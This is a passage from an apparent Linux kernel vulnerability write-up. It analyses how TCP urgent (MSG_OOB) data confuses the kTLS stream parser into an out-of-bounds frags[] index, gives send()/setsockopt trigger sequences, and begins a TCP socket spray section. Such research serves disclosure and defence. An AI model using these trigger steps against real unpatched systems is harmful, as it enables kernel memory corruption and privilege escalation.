<span class="k">static</span> <span class="kt">void</span> <span class="nf">tcp_check_urg</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">tcphdr</span> <span class="o">*</span><span class="n">th</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">u32</span> <span class="n">ptr</span> <span class="o">=</span> <span class="n">ntohs</span><span class="p">(</span><span class="n">th</span><span class="o">-&gt;</span><span class="n">urg_ptr</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">ptr</span> <span class="o">+=</span> <span class="n">ntohl</span><span class="p">(</span><span class="n">th</span><span class="o">-&gt;</span><span class="n">seq</span><span class="p">);</span>

    <span class="cm">/* Ignore urgent data that we've already seen and read. */</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">after</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">,</span> <span class="n">ptr</span><span class="p">))</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">before</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">))</span>
        <span class="k">return</span><span class="p">;</span>
    
    <span class="c1">// Allow newer urgent</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">after</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">))</span>
        <span class="k">return</span><span class="p">;</span>
    
    <span class="c1">// [...]</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span><span class="p">,</span> <span class="n">TCP_URG_NOTYET</span><span class="p">);</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">,</span> <span class="n">ptr</span><span class="p">);</span> <span class="c1">// [1]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code> calls <code class="language-plaintext highlighter-rouge">tcp_inq()</code> to obtain the <strong>current TCP in-queue size</strong> [2], i.e., how much data can be retrieved. This value depends on whether there is urgent data.</p>

<p>Each time a new urgent packet arrives, <code class="language-plaintext highlighter-rouge">tp-&gt;urg_seq</code> is set to <code class="language-plaintext highlighter-rouge">tp-&gt;rcv_nxt</code>, so all <code class="language-plaintext highlighter-rouge">tcp_inq()</code> calls from <code class="language-plaintext highlighter-rouge">tcp_urg()</code> fall into the second branch [3], returning the remaining data count.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">sz</span><span class="p">,</span> <span class="n">inq</span><span class="p">;</span>

    <span class="n">inq</span> <span class="o">=</span> <span class="n">tcp_inq</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">inq</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// [...]</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span> <span class="nf">tcp_inq</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">tcp_sock</span> <span class="o">*</span><span class="n">tp</span> <span class="o">=</span> <span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">answ</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">sock_flag</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">SOCK_URGINLINE</span><span class="p">)</span> <span class="o">||</span>
           <span class="o">!</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span> <span class="o">||</span>
           <span class="n">before</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">)</span> <span class="o">||</span>
           <span class="o">!</span><span class="n">before</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span><span class="p">,</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">))</span> <span class="p">{</span>

        <span class="n">answ</span> <span class="o">=</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span> <span class="o">-</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">;</span> <span class="c1">// [3]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">answ</span> <span class="o">=</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_seq</span> <span class="o">-</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">;</span> <span class="c1">// [5]</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">answ</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After that, <code class="language-plaintext highlighter-rouge">tcp_data_queue()</code> is called, and then <code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code> is invoked again [4].</p>

<p>This time, since the one-byte urgent data has already been processed and <code class="language-plaintext highlighter-rouge">tp-&gt;rcv_nxt</code> has been updated, <code class="language-plaintext highlighter-rouge">tcp_inq()</code> takes the last branch [5], returning the size of the remaining urgent data in the queue.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">tcp_data_queue</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">TCP_SKB_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">seq</span> <span class="o">==</span> <span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">eaten</span> <span class="o">=</span> <span class="n">tcp_queue_rcv</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">fragstolen</span><span class="p">);</span>
        
        <span class="c1">// [...]</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sock_flag</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">SOCK_DEAD</span><span class="p">))</span>
            <span class="n">tcp_data_ready</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [4]</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The function <code class="language-plaintext highlighter-rouge">tcp_queue_rcv()</code> not only processes packet data but also attempts to coalesce the data size [6].</p>

<p>This means if the previous <code class="language-plaintext highlighter-rouge">skb</code> has enough buffer space, the <strong>new skb will be merged into it</strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="n">__must_check</span> <span class="nf">tcp_queue_rcv</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                      <span class="n">bool</span> <span class="o">*</span><span class="n">fragstolen</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">eaten</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">tail</span> <span class="o">=</span> <span class="n">skb_peek_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_receive_queue</span><span class="p">);</span>

    <span class="n">eaten</span> <span class="o">=</span> <span class="p">(</span><span class="n">tail</span> <span class="o">&amp;&amp;</span>
         <span class="n">tcp_try_coalesce</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">tail</span><span class="p">,</span> <span class="c1">// [6]</span>
                  <span class="n">skb</span><span class="p">,</span> <span class="n">fragstolen</span><span class="p">))</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">tcp_rcv_nxt_update</span><span class="p">(</span><span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">),</span> <span class="n">TCP_SKB_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">end_seq</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">eaten</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">tcp_add_receive_queue</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
        <span class="n">skb_set_owner_r</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">sk</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">eaten</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>A flow diagram makes the sequence update clearer.</p>

<p><img src="/assets/image-20251003135826244.png" alt="image-20251003135826244" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h2 id="24-combine-all-together">2.4. Combine All Together</h2>

<p>After establishing the connection, we set the receive buffer of the server-side socket to the minimum size.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">rcvbuf_size</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
<span class="n">setsockopt</span><span class="p">(</span><span class="n">accept_fd</span><span class="p">,</span> <span class="n">SOL_SOCKET</span><span class="p">,</span> <span class="n">SO_RCVBUF</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">rcvbuf_size</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">rcvbuf_size</span><span class="p">));</span>
</code></pre></div></div>

<p>On the client side, we send the following packets:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>       <span class="c1">// copied_seq=0, urg_seq=0, rcv_nxt=1</span>
<span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">MSG_OOB</span><span class="p">);</span> <span class="c1">// copied_seq=0, urg_seq=1, rcv_nxt=2</span>
<span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="mh">0x2000</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>  <span class="c1">// copied_seq=0, urg_seq=1, rcv_nxt=0x2002</span>
</code></pre></div></div>

<p>When the last packet is sent, <code class="language-plaintext highlighter-rouge">tcp_inq()</code> returns 1 [1] (<code class="language-plaintext highlighter-rouge">urg_seq</code> - <code class="language-plaintext highlighter-rouge">copied_seq</code>), and <code class="language-plaintext highlighter-rouge">tls_strp_load_anchor_with_queue()</code> sets the anchor’s <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> to <code class="language-plaintext highlighter-rouge">inq</code>. Since <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> is smaller than the prepend size, <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> [3] returns zero, and <code class="language-plaintext highlighter-rouge">tls_strp_read_copy()</code> is then called [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">sz</span><span class="p">,</span> <span class="n">inq</span><span class="p">;</span>

    <span class="n">inq</span> <span class="o">=</span> <span class="n">tcp_inq</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">inq</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">tls_strp_load_anchor_with_queue</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">inq</span><span class="p">);</span> <span class="c1">// [2]</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span><span class="p">);</span> <span class="c1">// [3]</span>
        <span class="c1">// [...]</span>

        <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">=</span> <span class="n">sz</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">||</span> <span class="n">inq</span> <span class="o">&lt;</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">tls_strp_read_copy</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Because we send a packet larger than the receive buffer, <code class="language-plaintext highlighter-rouge">tcp_epollin_ready()</code> returns true [5], and <strong>copy mode is enabled</strong> [6].</p>

<p>Afterwards, <code class="language-plaintext highlighter-rouge">tls_strp_read_copyin()</code> is used to receive the data.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_copy</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="n">bool</span> <span class="n">qshort</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">qshort</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">tcp_epollin_ready</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">,</span> <span class="n">INT_MAX</span><span class="p">)))</span> <span class="c1">// [5]</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">copy_mode</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [6]</span>
    <span class="c1">// [...]</span>
    <span class="n">tls_strp_read_copyin</span><span class="p">(</span><span class="n">strp</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Internally, the TCP receive queue is iterated, and each retrieved packet along with its size is passed to <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> as the <code class="language-plaintext highlighter-rouge">in_skb</code> and <code class="language-plaintext highlighter-rouge">in_len</code> parameters.</p>

<p>In this function, the <code class="language-plaintext highlighter-rouge">in_skb</code> packet data is copied into the corresponding fragment (<code class="language-plaintext highlighter-rouge">-&gt;frags[]</code>) of the anchor packet. Since fragments store packet data in page units, <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> first calculates the fragment index <strong>using <code class="language-plaintext highlighter-rouge">skb-&gt;len / PAGE_SIZE</code></strong> [7].</p>

<p>If the record size (<code class="language-plaintext highlighter-rouge">strp-&gt;stm.full_len</code>) is still not determined [8], the packet is reparsed. The data is first copied into the buffer [9], <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> is updated, and then the record header is parsed [10].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_copyin_frag</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">in_skb</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span>
                <span class="kt">size_t</span> <span class="n">in_len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">frag</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frags</span><span class="p">[</span><span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">/</span> <span class="n">PAGE_SIZE</span><span class="p">];</span> <span class="c1">// [7]</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [8]</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">));</span>
        <span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">skb_copy_bits</span><span class="p">(</span><span class="n">in_skb</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">skb_frag_address</span><span class="p">(</span><span class="n">frag</span><span class="p">)</span> <span class="o">+</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">),</span> <span class="n">chunk</span><span class="p">));</span> <span class="c1">// [9] </span>

        <span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">chunk</span><span class="p">;</span>
        <span class="n">skb</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">chunk</span><span class="p">;</span>
        <span class="n">skb_frag_size_add</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">chunk</span><span class="p">);</span>

        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span> <span class="c1">// [10]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">sz</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">sz</span><span class="p">;</span>
        <span class="c1">// [..]</span>
    <span class="p">}</span>
    <span class="c1">// [..]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, due to this vulnerability, <strong>a malformed header may cause the packet not to be consumed (eaten)</strong>. As a result, <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> continues to grow, leading to an <strong>out-of-bounds index</strong> when accessing <code class="language-plaintext highlighter-rouge">frags[]</code>.</p>

<h2 id="25-access-uninitialized-fragment">2.5. Access Uninitialized Fragment</h2>

<p>After copy mode is enabled, we restore the receive buffer size of the accepted socket on the server side:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">rcvbuf_size</span> <span class="o">=</span> <span class="mh">0x20000</span><span class="p">;</span>
<span class="n">setsockopt</span><span class="p">(</span><span class="n">accept_fd</span><span class="p">,</span> <span class="n">SOL_SOCKET</span><span class="p">,</span> <span class="n">SO_RCVBUF</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">rcvbuf_size</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">rcvbuf_size</span><span class="p">));</span>
</code></pre></div></div>

<p>On the client side, the first call to <code class="language-plaintext highlighter-rouge">__tcp_read_sock()</code> consumes the urgent packet and updates <code class="language-plaintext highlighter-rouge">copied_seq</code> to match <code class="language-plaintext highlighter-rouge">urg_seq</code>. This causes <code class="language-plaintext highlighter-rouge">tcp_inq()</code> to return zero, preventing further progress.</p>

<p>To bypass this, we first <strong>send a <code class="language-plaintext highlighter-rouge">MSG_OOB</code> packet to update <code class="language-plaintext highlighter-rouge">urg_seq</code></strong>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">MSG_OOB</span><span class="p">);</span>
</code></pre></div></div>

<p>Afterwards, we can <strong>trigger <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> by sending additional packets</strong>. Each packet increases <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> by <code class="language-plaintext highlighter-rouge">0x1000</code>.</p>

<p>According to <code class="language-plaintext highlighter-rouge">tls_strp_read_copy()</code>, five pages [1] are allocated and populated into the fragment array of the anchor <code class="language-plaintext highlighter-rouge">skb</code> [2]:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_copy</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="n">bool</span> <span class="n">qshort</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">need_spc</span> <span class="o">=</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">?:</span> <span class="n">TLS_MAX_PAYLOAD_SIZE</span> <span class="cm">/* 0x4000 */</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="cm">/* 0x1000 */</span><span class="p">;</span> <span class="c1">// [1]</span>
    
    <span class="c1">// [...]</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">len</span> <span class="o">=</span> <span class="n">need_spc</span><span class="p">;</span> <span class="n">len</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span> <span class="n">len</span> <span class="o">-=</span> <span class="n">PAGE_SIZE</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">page</span> <span class="o">=</span> <span class="n">alloc_page</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_allocation</span><span class="p">);</span>
        <span class="c1">// [...]</span>
        <span class="n">skb_fill_page_desc</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span><span class="p">,</span> <span class="n">shinfo</span><span class="o">-&gt;</span><span class="n">nr_frags</span><span class="o">++</span><span class="p">,</span> <span class="c1">// [2]</span>
                   <span class="n">page</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So, after sending four packets (excluding the initial OOB), <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> becomes 4 x <code class="language-plaintext highlighter-rouge">0x1000</code> = <code class="language-plaintext highlighter-rouge">0x4000</code>. The initial OOB also increases <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> by <code class="language-plaintext highlighter-rouge">0x1000</code>, so <strong>the total is <code class="language-plaintext highlighter-rouge">0x5000</code></strong>. At this point <code class="language-plaintext highlighter-rouge">skb-&gt;len / PAGE_SIZE == 5</code>, which exceeds the initialized fragment array and causes an out-of-bounds access. The out-of-bounds access in <code class="language-plaintext highlighter-rouge">frags[]</code> will be triggered when <strong>the fifth packet</strong> is sent.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">4</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</code></pre></div></div>

<h2 id="3-exploit">3. Exploit</h2>

<h3 id="31-spraying-tcp-socket">3.1. Spraying TCP Socket</h3>

<p>The anchor packet is allocated in <code class="language-plaintext highlighter-rouge">tls_strp_init()</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tls_strp_init</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">sk</span><span class="p">;</span>
    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span> <span class="o">=</span> <span class="n">alloc_skb</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Internally, <code class="language-plaintext highlighter-rouge">alloc_skb()</code> calls <code class="language-plaintext highlighter-rouge">kmalloc_reserve()</code> to allocate the data buffer. In this case, the buffer is allocated from <code class="language-plaintext highlighter-rouge">skb_small_head_cache</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">alloc_skb</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">,</span>
                    <span class="n">gfp_t</span> <span class="n">priority</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">__alloc_skb</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">priority</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">NUMA_NO_NODE</span><span class="p">);</span> <span class="c1">// &lt;--------------------</span>
<span class="p">}</span>

<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">__alloc_skb</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">gfp_mask</span><span class="p">,</span>
                <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">int</span> <span class="n">node</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">skb</span> <span class="o">=</span> <span class="n">kmem_cache_alloc_node</span><span class="p">(</span><span class="n">cache</span><span class="p">,</span> <span class="n">gfp_mask</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">GFP_DMA</span><span class="p">,</span> <span class="n">node</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">kmalloc_reserve</span><span class="p">(</span><span class="o">&amp;</span><span class="n">size</span><span class="p">,</span> <span class="n">gfp_mask</span><span class="p">,</span> <span class="n">node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pfmemalloc</span><span class="p">);</span> <span class="c1">// &lt;--------------------</span>
    <span class="c1">// [...]</span>
    <span class="n">__build_skb_around</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
<span class="p">}</span>

